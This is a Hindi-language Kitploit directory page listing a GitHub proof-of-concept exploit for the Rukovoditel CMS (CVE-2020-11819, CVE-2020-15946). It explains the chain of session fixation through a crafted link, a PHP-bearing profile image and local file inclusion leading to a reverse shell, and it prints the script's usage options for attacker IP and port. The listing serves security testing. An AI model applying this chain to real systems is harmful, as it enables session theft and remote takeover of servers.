Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-RCE-Rukovoditel — CVE-2020-11819 और CVE-2020-15946 के लिए अवधारणा का प्रमाण | Kitploit
उपकरण/GitHubGitHub/danyx07/poc-rce-rukovoditel
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

CVE-2020-11819 और CVE-2020-15946 के लिए अवधारणा का प्रमाण

रिपॉजिटरी देखें
5 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PoC-RCE-Rukovoditel

CVE-2020-11819 और CVE-2020-15946 के लिए प्रूफ ऑफ कॉन्सेप्ट। Rukovoditel 2.4.x, 2.5.x और 2.6.1 पर परीक्षण किया गया।

विवरण:

इस एक्सप्लॉइट में निष्पादन के दो तरीके हैं, सत्र फिक्सेशन भेद्यता (CVE-2020-15946) का उपयोग करना या किसी भी प्रोफाइल के तहत किसी भी खाते के एक्सेस क्रेडेंशियल का उपयोग करना। --type L विकल्प के साथ, यह स्क्रिप्ट एक दुर्भावनापूर्ण लिंक बनाएगी, यदि पीड़ित ब्राउज़र में लिंक एक्सेस करता है, तो एक मनमाना सत्र पहचानकर्ता सेट हो जाएगा जिसका उपयोग उनके फोटो प्रोफाइल पर PHP सामग्री वाली छवि अपलोड करने के बाद उनके सत्र को चुराने के लिए किया जाएगा, और फिर लोकल फाइल इन्क्लूड (CVE-2020-11819) का उपयोग करके एक अच्छा रिवर्स शेल प्राप्त करें या, विकल्पों के साथ --type C -u -p आप क्रेडेंशियल प्रदान कर सकते हैं, PHP सामग्री वाली छवि लोड करें और कोड निष्पादन प्राप्त करने के लिए लोकल फाइल इन्क्लूजन (CVE-2020-11819) का उपयोग करें।

प्रो टिप: रजिस्ट्रेशन मॉड्यूल सक्षम है या नहीं, यह जांचना याद रखें ;)

उपयोग

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

Rukovoditel के लिए पोस्ट-ऑथेंटिकेट RCE, स्क्रिप्ट संस्करण 1.0

वैकल्पिक तर्क:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-t URL, --target URL CMS Rukovoditel का URL/पूर्ण पथ http://url/path/to/cms/
-u USER, --user USER प्रमाणीकरण के लिए उपयोगकर्ता नाम
-p PASSWORD, --password PASSWORD प्रमाणीकरण के लिए पासवर्ड
-a TYPE, --type TYPE लिंक उत्पन्न करने और सत्र चुराने के लिए -a L का उपयोग करें या यदि आपके पास वेब एप्लिकेशन तक पहुंच क्रेडेंशियल हैं तो -a C का उपयोग करें
--ip IP_ATTACKER रिवर्स शेल के लिए हमलावर का IP!
--port PORT_ATTACKER रिवर्स शेल कनेक्शन के लिए पोर्ट
--proxy PROXY डिबगिंग के लिए http प्रॉक्सी सेटअप करें http://127.0.0.1:8080

टूल डाउनलोड करें